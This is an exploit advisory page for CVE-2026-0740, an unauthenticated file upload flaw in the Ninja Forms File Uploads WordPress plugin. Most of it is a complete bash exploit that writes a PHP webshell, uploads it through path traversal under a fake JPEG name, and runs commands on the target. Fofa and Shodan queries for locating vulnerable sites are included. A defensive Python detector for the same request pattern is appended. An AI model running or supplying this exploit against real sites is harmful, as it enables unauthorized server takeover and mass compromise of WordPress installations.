Ninja Forms Uploads Unauthenticated PHP File Upload

2026.05.13
Risk: High
Local: No
Remote: Yes
CWE: CWE-264

# Exploit Title: Ninja Forms Uploads - Unauthenticated PHP File Upload
# Date: 2026-04-09
# Exploit Author: Sélim Lanouar (@whattheslime)
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://ninjaforms.com/extensions/file-uploads/
# Version: 3.3.24
# Tested on: WordPress (6.9.3) on Apache and Nginx servers
# CVE: CVE-2026-0740
# Fofa Query: body="nfpluginsettings.js?ver="
# Shodan Query: http.html:"nfpluginsettings.js?ver="
# =============================================================================

if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <target_url>"
    exit 1
fi

target=$1
field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16 ; echo)
file_name=webshell.php

echo "[-] Writing webshell in /tmp/$file_name..."
echo '<?php system($_GET["cmd"]); ?>' > /tmp/$file_name

echo "[-] Fetching nonce for random field_id $field_id..."
nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php" \
    -d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce')
echo "[+] Got nf_fu_upload nonce: $nonce"

echo "[-] Uploading webshell..."
response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php" \
    -F "action=nf_fu_upload" \
    -F "nonce=$nonce" \
    -F "form_id=$field_id" \
    -F "field_id=$field_id" \
    -F "image_jpg=../../../$file_name" \
    -F "files-$field_id=@/tmp/$file_name;filename=image.jpg;type=image/jpeg")
echo "[+] Upload response: $response"

command="curl -ks '$target/wp-content/$file_name?cmd=id'"
echo "[-] Executing the 'id' command via the uploaded webshell: $command"
result=$(eval $command)
echo "[+] Command output: $result"
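Added here as a defender-side example, not part of the advisory or the plugin: a Python check, using only the standard-library email parser, that inspects a captured multipart admin-ajax.php body and flags the two indicators the script above relies on (a traversal sequence in the image_jpg text field, and PHP open tags in a file part declared as an image). The boundary, field id, nonce and both request bodies are constructed samples, and the rule is the kind a WAF or log-replay tool would run.

```python
import re
from email import message_from_bytes
from email.policy import default

TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")   # "../x", "..\x", "x/.."
PHP_TAG = re.compile(rb"<\?(php|=)")                 # PHP open tags inside a body
BOUNDARY = "----nfdemo"                              # constructed boundary


def _part(name, value, filename=None, ctype=None):
    """Build one multipart/form-data part (helper for the constructed samples)."""
    disp = f'form-data; name="{name}"' + (f'; filename="{filename}"' if filename else "")
    ctype_hdr = f"Content-Type: {ctype}\r\n" if ctype else ""
    return f"--{BOUNDARY}\r\nContent-Disposition: {disp}\r\n{ctype_hdr}\r\n{value}\r\n"


# Constructed request bodies, not real captures. SAMPLE_BODY mirrors the field layout
# of the exploit above (traversal in image_jpg, PHP text declared as image/jpeg);
# BENIGN_BODY is a legitimate-looking upload through the same AJAX action.
FIELD_ID = "5551234"
SAMPLE_BODY = "".join([
    _part("action", "nf_fu_upload"), _part("nonce", "placeholder-nonce"),
    _part("form_id", FIELD_ID), _part("field_id", FIELD_ID),
    _part("image_jpg", "../../../webshell.php"),
    _part(f"files-{FIELD_ID}", "<?php /* constructed marker */ ?>", "image.jpg", "image/jpeg"),
]).encode() + f"--{BOUNDARY}--\r\n".encode()
BENIGN_BODY = "".join([
    _part("action", "nf_fu_upload"), _part("nonce", "placeholder-nonce"),
    _part("form_id", FIELD_ID), _part("field_id", FIELD_ID), _part("image_jpg", "photo.jpg"),
    _part(f"files-{FIELD_ID}", "JFIF-placeholder-bytes", "photo.jpg", "image/jpeg"),
]).encode() + f"--{BOUNDARY}--\r\n".encode()


def inspect_upload_request(body: bytes, boundary: str) -> list[str]:
    """Return findings for an nf_fu_upload request; an empty list means nothing flagged."""
    head = f'Content-Type: multipart/form-data; boundary="{boundary}"\r\n\r\n'.encode()
    msg = message_from_bytes(head + body, policy=default)
    fields, files = {}, []
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        if part.get_filename():
            files.append((name, part.get_filename(), part.get_content_type(), data))
        else:
            fields[name] = data.decode("utf-8", "replace").strip()
    if fields.get("action") != "nf_fu_upload":
        return []                      # only the file-upload AJAX action is in scope
    findings = [f"path traversal in field {n!r}: {v!r}" for n, v in fields.items() if TRAVERSAL.search(v)]
    findings += [f"PHP open tag in {n!r} declared as {t} ({f})"
                 for n, f, t, d in files if t.startswith("image/") and PHP_TAG.search(d)]
    return findings
```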


Copyright 2026, cxsecurity.com